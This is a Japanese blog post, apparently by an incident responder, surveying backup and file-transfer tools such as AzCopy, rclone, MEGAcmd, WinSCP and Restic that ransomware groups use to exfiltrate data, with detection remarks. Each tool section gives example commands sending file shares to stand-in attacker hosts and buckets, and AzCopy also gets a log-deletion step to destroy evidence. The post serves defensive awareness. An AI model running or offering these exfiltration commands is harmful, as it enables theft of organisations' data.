Varonisの公開した記事では、microsoftのazcopyを使用してAzureのストレージにファイルをアップロードする情報持ち出し手法に関して記載されていた。
そこで、他にも一般的に使用されるデータコピー/バックアップツールで悪用されているものってあるんだろうなぁという思いから、簡単に調べてみることにした。
主なソースは、RANSOMWARE.LIVE
ransomware.live
ランサムウェア攻撃者の選ぶデータ転送ソリューション
ここでは、windowsにデフォルトで入っていないもので、普通にファイルバックアップとかに使用されるツールに注目。
AzCopy
Microsoft Azure ストレージ転送用コマンド。
BianLian, Rhysidaなどが前々から使用しているようだが、最近さらに多い気がする。
ディレクトリごとでも、ファイル単体でも。
# SAS トークン付きの Blob ストレージへのコピー azcopy.exe copy "\\fileserver\HR\" "https://exfilacct.blob.core.windows.net/data?sv=2022-11-02&ss=b&srt=co&sp=rwdlacu&se=2026-12-31&sig=XXXXX" --recursive # サービスプリンシパルでのログイン azcopy.exe login --tenant-id xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx # ジョブログの消去(証拠隠滅) rmdir /s /q %USERPROFILE%\.azcopy
*.core.windows.netへの怪しい通信が増加する。
HTTPS経由でAzureインフラとのみ通信し、野良サーバへの通信が発生しない。
Backblaze B2 CLI (b2.exe)
Backblazeのコマンドラインツール。
www.backblaze.com
日本人はあんまりBackblazeを使用していないイメージ。
INCRansomで使用されていたらしい。
# INC Ransom で観測されたコマンド b2.exe sync \\fileserver\data\ b2://exfil-bucket --include-regex "(?i).*\.(doc|xls|xlsx|docx|pdf|csv)$|wallet\.dat$" --exclude-regex ".*" --keep-days 1826 --allow-empty-source --skip-hash-verification --exclude-all-symlinks --threads 30 # 認証 b2.exe authorize-account <applicationKeyId> <applicationKey> # 単一ファイルアップロード b2.exe upload-file exfil-bucket C:\staging\dump.7z dump.7z
これはBackblazeのインフラとのみ通信。
Cyberduck
たぶん、企業環境では使用されないクラウドストレージCyberduckのコマンドラインツール。
cyberduck.io
日本のランサムウェア被害の調査では、1回だけ見つけたことがある。
Scattered Spiderによる使用事例が確認されている。
# CLI版(duck)で S3 へアップロード duck.exe --upload s3://exfil-bucket/data/ C:\staging\dump.7z --username AKIAXXXXXXXXXX --password SECRET # SFTP 転送 duck.exe --upload sftp://attacker@185.xx.xx.xx/upload/ C:\data\confidential.zip # Backblaze B2 へのコピー duck.exe --copy "b2://bucket-name/path/" --existing rename C:\staging\
対応転送先は、幅広いCyberduck自体, AWS S3, GCPのストレージ, Azureも対応。その他も色々。
DRACOON, Files.comとか全然知らんやつも対応している。
Dropbox CLI
Dropbox非公式のCLIツール。
BlackCatやScattered Spideによる使用が確認されている。
# アップロード dbxcli.exe put C:\staging\dump.7z /exfil/dump.7z dbxcli.exe mkdir /exfil dbxcli.exe put -r C:\staging\ /exfil/
アップロード先がDropboxになるので、おそらくDropbox公式インフラとの通信のみ。
FileZilla
FTPでのデータ転送に使用される。
FTPサーバ立てるのも、FTPクライアントととしてだけ使用するのもお手軽なので多数のランサムウェア攻撃者に好まれる。
Akira, AvosLocker, BlackCat, Diavol, Karakurt, LockBit, Nokoyawa, PYSA, Scattered Spiderなど様々な攻撃者が使用。
# GUI 起動(攻撃者は RDP 経由で操作)[4] filezilla.exe # サイトマネージャに事前登録した接続先を使用 filezilla.exe --site="0/attacker-sftp" # ポータブル版の実行(インストール不要) C:\Users\admin\Downloads\FileZilla_Portable\filezilla.exe # 子プロセスとして生成される SFTP エンジン fzsftp.exe (親: filezilla.exe)
入ってくる通信よりも出ていく通信の方がブロックされにくいので、FTPクライアントが被害環境に持ち込まれることが多いハズ。
一度だけ、攻撃者が漏洩データ保存先FTPサーバの認証情報を消すの忘れて、「これ残ってたんですけど、ログインしにいっても良いですか」っていう問い合わせがあった。
「いやー止めた方が良いですよ」って言ったけど、あれはどうなったんだろうなぁ。
FreeFileSync
本当に全く見たことないが、Lockbitの使用事例があるらしい。
# バッチジョブ実行(事前に作成した設定ファイル) FreeFileSync.exe C:\temp\exfil_job.ffs_batch # GUI で設定後、RealTimeSync で継続監視・自動同期 RealTimeSync.exe C:\temp\auto_sync.ffs_real # SFTP 同期設定が含まれるバッチファイルの実行 FreeFileSync.exe "C:\Users\admin\Desktop\sync_to_sftp.ffs_batch"
ファイル同期ツールぽいので一気に持っていくよりかは、じわじわとデータ転送するような感じだと思っている。
GoodSync
CLIはjob実行というのがメインに見える。
# CLI でのジョブ実行 gsync.exe /analyze /sync /exit "SFTPBackup" # ジョブ作成(左: ローカル、右: SFTPサーバ) gsync.exe /newjob "exfil" /left="C:\staging\" /right="sftp://user:pass@host/upload/" /sync /exit # サイレント同期 GoodSync.exe /sync "JobName" /noui /exit
GoodSync Connectという公式サービス, AWS S3, GCPのストレージ, Azure,FTPやWebDAV,NAS系も対応しているらしい。
www.goodsync.com
MEGASync/MEGAcmd/Megatools
Megatools - command line client for Mega.nz
MEGA用の公式ツールや非公式ツールが使用されているらしい。
MEGAが匿名クラウドストレージということで、ランサムウェア攻撃者以外も皆大好き。
Akira, Conti, BlackCat, Karakurt, LockBit, BianLian, Hive, Phobos, MountLocker, Quantum, INC Ransom, Avaddon, MONTI, DarkSide, Vice Society, FiveHands, Ghost/Cring, NightSpire, Storm-0501, Trigona...皆使っている。
# MEGASync GUI はインストール後に自動同期開始 MEGAsync.exe # MEGAcmd: ログインしてフォルダ同期 mega-login attacker@protonmail.com P@ssw0rd123 mega-put -c C:\staging\dump.7z /Root/exfil/ mega-sync C:\staging\ /Root/exfil/ # Megatools: ファイルアップロード megaput.exe --path /Root/victim-data/ C:\temp\financial_records.7z megacopy.exe --local C:\staging\ --remote /Root/dump/ --upload
*.mega.co.nzへの通信が大量発生すると思われる。
pCloud
生涯プランもある安めのクラウドストレージpCloud。
CLIではなく、インストールしてGUIが使用されているらしい。
DarkSide, FiveHandsが使用していたとのこと。
# pCloud Drive のインストール後、同期フォルダにファイルをコピー pCloudDrive.exe robocopy C:\staging\ "P:\exfil\" /E /R:1 /W:0 # API 経由(curl) curl.exe -X POST "https://api.pcloud.com/uploadfile?path=/exfil&auth=XXXXXXX" -F "file=@C:\staging\dump.7z"
どちらかというと、ツールというよりはアップロード先として使用するクラウドサービスとしての使用って表現した方が良いか?
RCLONE
最も多くのクラウドストレージサービスに対応しており、最もサイバー犯罪者に好まれるデータ転送ツール。
データ漏洩は、とりあえずこれ使っとけくらいの雰囲気で使用されている。
LockBit, BlackSuit/Royal, Black Basta, BlackCat/ALPHV, Akira, Conti, Hive, BianLian, Karakurt, Daixin, Trigona, Quantum, REvil, 8BASE, INC Ransom, Cactus, AvosLocker, Medusa, Dagon Locker, DarkSide, Avaddon, RansomHub, Vice Society他多数。
# MEGA へのコピー
rclone.exe copy \\fileserver\shares\ mega:exfil-data --transfers 20 --checkers 10
# FTP サーバへの転送
rclone.exe config create myftp ftp host 185.xx.xx.xx port 21 user ftpuser pass ftppass
rclone.exe copy C:\staging\ myftp:/upload/ --bwlimit 50M
# S3 互換ストレージへの同期
rclone.exe sync \\DC01\SYSVOL\ s3:exfil-bucket/sysvol/ --max-age 1y --include "*.{pdf,docx,xlsx,pst}"
# Dropbox(リネームバイナリで実行された例)
svhost.exe copy D:\Finance\ dropbox:finance-dump --transfers 15
RCLONE公式サービスは無いので、対応サービス先が転送先になる。
あるサービスへの転送がブロックされても他のサービスに切り替えてデータ転送するというような戦略も実行されている。
データ容量が大きければ、複数のサービスに分けてアップロードして検知回避や転送効率化を狙っているかもしれない。
Restic
これも見たことが無いが、比較的使用例が多いらしい。
BlackCat/ALPHV, INC Ransom, Lynx, IMN Crewなど。
# REST サーバへのバックアップ restic.exe -r rest:http://185.xx.xx.xx:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup \\fileserver\shares # S3 互換ストレージへのバックアップ restic.exe -r s3:https://s3.us-east-1.amazonaws.com/exfil-bucket backup C:\Users\ --exclude="*.exe" # リポジトリ初期化 restic.exe -r rest:http://C2:8000/ init --password-file ppp.txt
AWS S3, GCPのストレージ, Azureは対応。
rclone経由でのバックアップというのに対応しているらしい???
https://restic.readthedocs.io/en/latest/030_preparing_a_new_repo.html#other-services-via-rclone
WinSCP
WindowsでのSCP転送と言えばコレ!ってくらいに有名で、お手軽さは攻撃者も好み。
Play, RansomHub, Akira, Conti, Monti, Rhysida, Vice Society, LockBit, Black Basta, BlackSuit他多数。
Rcloneに次ぐ使用頻度とのこと。
# スクリプトモードで SFTP アップロード [6] winscp.com /command "open sftp://root:toor@185.xx.xx.xx:22" "put C:\staging\*.7z /upload/" "exit" # スクリプトファイルからの実行 winscp.com /script=C:\temp\exfil_script.txt /log=C:\temp\winscp.log # INI無効化(レジストリ設定を使わない)+ ディレクトリ同期 winscp.com /ini=nul /command "open sftp://user:pass@host" "synchronize remote C:\data /remote/data" "exit" # SCP モード winscp.com /command "open scp://admin:P@ss@10.0.0.5" "put D:\Finance\*.xlsx /tmp/" "exit"
SFTP/SCP/FTPクライアントとして利用される。
これでも、ほんの一部の手法
他にもWindowsに既にあるコマンド(robocopy.exeなど)で持ち出したり、ファイルストレージサービス(Sendspace,temp[.]sh)にアップロードしたりもある。
全て網羅して監視なんていうのはできないだろうが、これまであった事例ベースだけでも可能な限り把握しておきたい。
でも、普通じゃない方法でデータコピーしたら怪しいけどね。
ただし、大体は監視して無さそうな時間帯か、休日に一気に移動させるから検知回避されているという印象。
